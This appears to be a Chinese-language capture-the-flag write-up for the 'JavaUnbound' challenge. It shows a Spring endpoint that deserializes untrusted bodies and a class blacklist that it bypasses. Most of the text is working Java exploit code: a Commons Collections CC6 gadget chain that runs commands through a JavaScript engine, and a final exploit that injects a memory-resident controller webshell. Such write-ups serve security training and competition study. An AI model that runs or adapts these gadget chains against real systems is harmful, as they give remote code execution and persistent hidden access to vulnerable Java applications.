2026 ccb final wp

JavaUnbound

controller直接有反序列化

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


@PostMapping({"/"})
    public String deserialize(@RequestBody byte[] data) {
        try {
            ByteArrayInputStream bais = new ByteArrayInputStream(data);
            ObjectInputStream ois = new SafeObjectInputStream(bais);
            Object obj = ois.readObject();
            ois.close();
            return "deserialization success";
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

黑名单

1

    private static final String[] blacklist = new String[]{"java.lang.Runtime", "java.lang.ProcessBuilder", "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", "java.security.SignedObject", "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet", "javax.management.remote.rmi.RMIConnector"};

有cc依赖可以打cc1或者cc6,而且没有banScriptEngineManager,直接js eval,本地弹计算器poc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67


package com.cc6test;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.script.ScriptEngineManager;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLEncoder;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class Test02 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(ScriptEngineManager.class),

                // 调用 Class<T> 的 newInstance()，参数为空
                new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),

                // 调用 ScriptEngineManager 的 getEngineByName，参数为 "js"
                new InvokerTransformer("getEngineByName",
                        new Class[]{String.class},
                        new Object[]{"js"}),

                // 调用 ScriptEngine (接口) 的 eval()，参数为执行命令的 JS 代码
                new InvokerTransformer("eval",
                        new Class[]{String.class},
                        new Object[]{"java.lang.Runtime.getRuntime().exec('calc')"})
        };

        ChainedTransformer chainedTransformer =  new ChainedTransformer(transformers);
        HashMap<Object,Object> map = new HashMap<>();
        Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry t = new TiedMapEntry(lazymap, "key");
        HashMap<Object, Object> finalmap = new HashMap<>();
        finalmap.put(t, "value");
        lazymap.remove("key");
        Class c = LazyMap.class;
        Field f = c.getDeclaredField("factory");
        f.setAccessible(true);
        f.set(lazymap,chainedTransformer);
        byte[] bytes = serialize(finalmap);
        String evilCode = Base64.getEncoder().encodeToString(bytes);
        System.out.println(evilCode);
//        unserialize("ser.bin");
    }
    //定义序列化方法
    public static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(out);
        objectOutputStream.writeObject(obj);
        return out.toByteArray();
    }
    //定义反序列化方法
    public static Object unserialize(String Filename) throws Exception {
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(Filename));
        Object o = in.readObject();
        return o;
    }
}

远程环境不出网，打controller内存马,最终exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76


package com.ezjava;  
  
import javassist.ClassPool;  
import javassist.CtClass;  
import org.apache.commons.collections.Transformer;  
import org.apache.commons.collections.functors.ChainedTransformer;  
import org.apache.commons.collections.functors.ConstantTransformer;  
import org.apache.commons.collections.functors.InvokerTransformer;  
import org.apache.commons.collections.keyvalue.TiedMapEntry;  
import org.apache.commons.collections.map.LazyMap;  
  
import javax.script.ScriptEngineManager;  
import java.io.ByteArrayOutputStream;  
import java.io.FileInputStream;  
import java.io.ObjectInputStream;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
import java.util.Base64;  
import java.util.HashMap;  
import java.util.Map;  
  
public class exp {  
    public static void main(String[] args) throws Exception {  
        byte[] bytesa = GenerateMemShell();  
        String a = Base64.getEncoder().encodeToString(bytesa);  

        Transformer[] transformers = new Transformer[]{  
                new ConstantTransformer(ScriptEngineManager.class),  
  
                // 调用 Class<T> 的 newInstance()，参数为空  
                new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),  
  
                // 调用 ScriptEngineManager 的 getEngineByName，参数为 "js"                new InvokerTransformer("getEngineByName",  
                        new Class[]{String.class},  
                        new Object[]{"js"}),  
  
                // 调用 ScriptEngine (接口) 的 eval()，参数为执行命令的 JS 代码  
                new InvokerTransformer("eval",  
                        new Class[]{String.class},  
                        new Object[]{"org.springframework.cglib.core.ReflectUtils.defineClass(\"com.ezjava.controller.InjectToController\",org.springframework.util.Base64Utils.decodeFromString(\""+a+"\"),java.lang.Thread.currentThread().getContextClassLoader()).newInstance()"})  
        };  
  
        ChainedTransformer chainedTransformer =  new ChainedTransformer(transformers);  
        HashMap<Object,Object> map = new HashMap<>();  
        Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));  
        TiedMapEntry t = new TiedMapEntry(lazymap, "key");  
        HashMap<Object, Object> finalmap = new HashMap<>();  
        finalmap.put(t, "value");  
        lazymap.remove("key");  
        Class c = LazyMap.class;  
        Field f = c.getDeclaredField("factory");  
        f.setAccessible(true);  
        f.set(lazymap,chainedTransformer);  
        byte[] bytes = serialize(finalmap);  
        String evilCode = Base64.getEncoder().encodeToString(bytes);  
        System.out.println(evilCode);  
    }  
    private static byte[] GenerateMemShell() throws Exception{  
        ClassPool pool = ClassPool.getDefault();  
        CtClass ctClass = pool.getCtClass("com.ezjava.controller.InjectToController");  
        return ctClass.toBytecode();  
    }  

    public static byte[] serialize(Object obj) throws Exception {  
        ByteArrayOutputStream out = new ByteArrayOutputStream();  
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(out);  
        objectOutputStream.writeObject(obj);  
        return out.toByteArray();  
    }  

    public static Object unserialize(String Filename) throws Exception {  
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(Filename));  
        Object o = in.readObject();  
        return o;  
    }  
}